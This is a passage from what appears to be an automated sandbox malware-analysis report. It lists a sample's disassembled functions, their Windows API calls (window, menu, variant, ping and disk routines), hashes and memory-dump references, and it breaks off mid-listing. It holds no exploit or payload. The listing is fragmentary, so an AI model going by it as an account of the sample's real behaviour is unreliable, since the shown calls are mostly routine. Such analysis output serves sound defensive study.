                                                                                                                    • Opcode Fuzzy Hash: 4353c8540880e7b1092cafd08b3081c4fbd77e070fb81709c8b777d1aeab0d1c
                                                                                                                    • Instruction Fuzzy Hash: 94B10D75A00219AFDB05EFA4C885DAEBBB9FF49314F1484A9F909DB261DB30ED41CB50
                                                                                                                    Function 0037C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0037C283
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0037C295
                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0037C2F3
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0037C2FE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0037C310
                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0037C364
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037C372
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0037C383
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0037C3C6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0037C3D4
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0037C3F1
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0037C3FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: 5ca7a380b0b233b33431b355d4e237683d4e09240fb554edac74df6bfda80d2e
                                                                                                                    • Instruction ID: 8f7454cd8528181cc6fdd9b53d2c21155f1880e86797a58096c539665704fa92
                                                                                                                    • Opcode Fuzzy Hash: 5ca7a380b0b233b33431b355d4e237683d4e09240fb554edac74df6bfda80d2e
                                                                                                                    • Instruction Fuzzy Hash: 0F515371B10205AFDF19CFA9DD89AAEBBBAEB88310F14812DF519D72A0D7749D008B10
                                                                                                                    Function 0032201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00321B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00322036,?,00000000,?,?,?,?,003216CB,00000000,?), ref: 00321B9A
                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003220D3
                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0032216E
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0035BCA6
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0035BCD7
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0035BCEE
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0035BD0A
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0035BD1C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 3e13b37e32299b4282baac0e115ce47eaf9c666a94ba81349f5fc68260da54b6
                                                                                                                    • Instruction ID: 8cb5d1d192e189cf46d6e13bb2834fb10aa63d26c2ec9cd125b748d700d62e2d
                                                                                                                    • Opcode Fuzzy Hash: 3e13b37e32299b4282baac0e115ce47eaf9c666a94ba81349f5fc68260da54b6
                                                                                                                    • Instruction Fuzzy Hash: EB619131500A60EFCB379F15ED88B26B7F9FF41316F518628E9824A9B0C771A895DB90
                                                                                                                    Function 003221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003225DB: GetWindowLongW.USER32(?,000000EB), ref: 003225EC
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 003221D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: e4a445cd75e667d411511f7a3d4550549c8545711940849179e6bd57e545ab8e
                                                                                                                    • Instruction ID: 681f19c82013c528a6bee0039af5e5a9020697cc0f6002bb92f86b87e3e48173
                                                                                                                    • Opcode Fuzzy Hash: e4a445cd75e667d411511f7a3d4550549c8545711940849179e6bd57e545ab8e
                                                                                                                    • Instruction Fuzzy Hash: D7419131100654EFDB275F68EC88BBA3B69EB06331F194365FD659A1E1C7328C42DB21
                                                                                                                    Function 0038A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,003AF910), ref: 0038A90B
                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,003D89A0,00000061), ref: 0038A9D5
                                                                                                                    • _wcscpy.LIBCMT ref: 0038A9FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                    • Opcode ID: afbed73333a051c9adcd7a7f31e594f9245fe764eec0ed528b067b1d257afd22
                                                                                                                    • Instruction ID: 99bad35f7090edf19e89e76c1e3555de7cfe10c3929a87a9e08b3bbbd77cac0e
                                                                                                                    • Opcode Fuzzy Hash: afbed73333a051c9adcd7a7f31e594f9245fe764eec0ed528b067b1d257afd22
                                                                                                                    • Instruction Fuzzy Hash: 3951AD315087019FD306EF14D892AAFB7E9FF85300F15486EF5995B2A2DB31A909CB93
                                                                                                                    Function 00329837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                    • Opcode ID: 64f22e00f0699c45179baac3b0343b20f0a18bfc2db64e1c1387ae679ee93b37
                                                                                                                    • Instruction ID: c0a0f82b0e461110415f31671dd4a2208859c813ec8e1a8e361786f585857b79
                                                                                                                    • Opcode Fuzzy Hash: 64f22e00f0699c45179baac3b0343b20f0a18bfc2db64e1c1387ae679ee93b37
                                                                                                                    • Instruction Fuzzy Hash: 4641C771A04219AFDB26DF34E842E7677E8FF06300F24487FE949DF291EA31A9458B10
                                                                                                                    Function 003A7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003A716A
                                                                                                                    • CreateMenu.USER32 ref: 003A7185
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 003A7194
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A7221
                                                                                                                    • IsMenu.USER32(?), ref: 003A7237
                                                                                                                    • CreatePopupMenu.USER32 ref: 003A7241
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A726E
                                                                                                                    • DrawMenuBar.USER32 ref: 003A7276
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                    • Opcode ID: 8651557593b62c120c34cac6ad4ad3d437e903dc868067d546a21b328b70831d
                                                                                                                    • Instruction ID: e7d70efc8af59b3263118e513b8cf9dc2c051a6559b303d0b269214cf7a4420b
                                                                                                                    • Opcode Fuzzy Hash: 8651557593b62c120c34cac6ad4ad3d437e903dc868067d546a21b328b70831d
                                                                                                                    • Instruction Fuzzy Hash: 48413578A01205EFDB22DFA4D984F9A7BB9FF4A310F154528F945A7361D731A910CB90
                                                                                                                    Function 003A74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003A755E
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 003A7565
                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003A7578
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003A7580
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003A758B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 003A7594
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003A759E
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003A75B2
                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003A75BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                    • Opcode ID: 56a94221e40b1f4c03546b51a0bbcba4b61f5ae8b696bc23aae97a5cbb473c2d
                                                                                                                    • Instruction ID: 786a898cdf8a8d1ccb458c2221830707f94d653a1f2bc01b6ac18889ae5b218d
                                                                                                                    • Opcode Fuzzy Hash: 56a94221e40b1f4c03546b51a0bbcba4b61f5ae8b696bc23aae97a5cbb473c2d
                                                                                                                    • Instruction Fuzzy Hash: CD315632504214AFDF229FA4DC48FEB3B6DEF0B360F110224FA55A60A0C731D821DBA4
                                                                                                                    Function 00346E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00346E3E
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00346ED7
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00346F0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00346F2A
                                                                                                                    • __allrem.LIBCMT ref: 00346F80
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00346F9C
                                                                                                                    • __allrem.LIBCMT ref: 00346FB3
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00346FD1
                                                                                                                    • __allrem.LIBCMT ref: 00346FE8
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00347006
                                                                                                                    • __invoke_watson.LIBCMT ref: 00347077
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction ID: 29ef9ba09c694d41bae13fe02484dd94c6516cc738d9b1d6c33bc2c177b9023a
                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction Fuzzy Hash: 0B712776A00716ABD716AF68DC42BAAB3F8AF05364F104629F814DF291E770FD448791
                                                                                                                    Function 00382527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00382542
                                                                                                                    • GetMenuItemInfoW.USER32(003E5890,000000FF,00000000,00000030), ref: 003825A3
                                                                                                                    • SetMenuItemInfoW.USER32(003E5890,00000004,00000000,00000030), ref: 003825D9
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 003825EB
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0038262F
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0038264B
                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00382675
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003826BA
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00382700
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00382714
                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00382735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4176008265-0
                                                                                                                    • Opcode ID: 47e65a6b8c9ed629b7006e20ed8ea7456e9be2ec682a7eec408295a030895521
                                                                                                                    • Instruction ID: 24cdec357357d8640e6b4d719bb164dbe1e130a3f3580e1abc79452447526523
                                                                                                                    • Opcode Fuzzy Hash: 47e65a6b8c9ed629b7006e20ed8ea7456e9be2ec682a7eec408295a030895521
                                                                                                                    • Instruction Fuzzy Hash: 56618F70900349AFDB23EFA4D988DAFBBB8EB42304F150599F841A7251E771AD05DB20
                                                                                                                    Function 003A6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A6FA5
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A6FA8
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A6FCC
                                                                                                                    • _memset.LIBCMT ref: 003A6FDD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A6FEF
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A7067
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 830647256-0
                                                                                                                    • Opcode ID: 117dfec6c2e790c71fd697734fa4b6a599a86403158a81ca1c5cb122a2321ade
                                                                                                                    • Instruction ID: 790ece8f712d17d7c0470686bacb58e210be078f8e2d4d6e3bf0c8bb21a200e3
                                                                                                                    • Opcode Fuzzy Hash: 117dfec6c2e790c71fd697734fa4b6a599a86403158a81ca1c5cb122a2321ade
                                                                                                                    • Instruction Fuzzy Hash: BB617C75A00248AFDB12DFA4CC81EEE77F8EB0A714F144159FA14EB2A1C775AD41DB90
                                                                                                                    Function 00376B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00376BBF
                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00376C18
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00376C2A
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00376C4A
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00376C9D
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00376CB1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00376CC6
                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00376CD3
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00376CDC
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00376CEE
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00376CF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706829360-0
                                                                                                                    • Opcode ID: e3bdfb01148bb48d85bf2988745beb3393bd6b53ef4fdcc28c224d6fb64151a3
                                                                                                                    • Instruction ID: 5888a9204c44a174a9f5ffe998db421253a9259660468b44225a8af7eada2877
                                                                                                                    • Opcode Fuzzy Hash: e3bdfb01148bb48d85bf2988745beb3393bd6b53ef4fdcc28c224d6fb64151a3
                                                                                                                    • Instruction Fuzzy Hash: 6B418E31A00219DFCF16DFA9D8559EEBBBDEF08300F00C069E955EB261CB34A945CB90
                                                                                                                    Function 00395732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00395793
                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 003957D8
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 003957E4
                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 003957F2
                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00395862
                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00395878
                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003958ED
                                                                                                                    • WSACleanup.WSOCK32 ref: 003958F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                    • String ID: Ping
                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                    • Opcode ID: e240bbf922fda0baab2888644e13be28e3eb77bc463c0c7c28e89f2868acfad2
                                                                                                                    • Instruction ID: 34c6e2a6d29a9efeb2803331076d94882c38f388b7d1a1a4272b6529d5cc4ce0
                                                                                                                    • Opcode Fuzzy Hash: e240bbf922fda0baab2888644e13be28e3eb77bc463c0c7c28e89f2868acfad2
                                                                                                                    • Instruction Fuzzy Hash: DD516E316047019FDB23EF64DC45B2AB7E8EF49720F05892AF956DB2A1DB70E940DB42
                                                                                                                    Function 0038B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038B4D0
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0038B546
                                                                                                                    • GetLastError.KERNEL32 ref: 0038B550
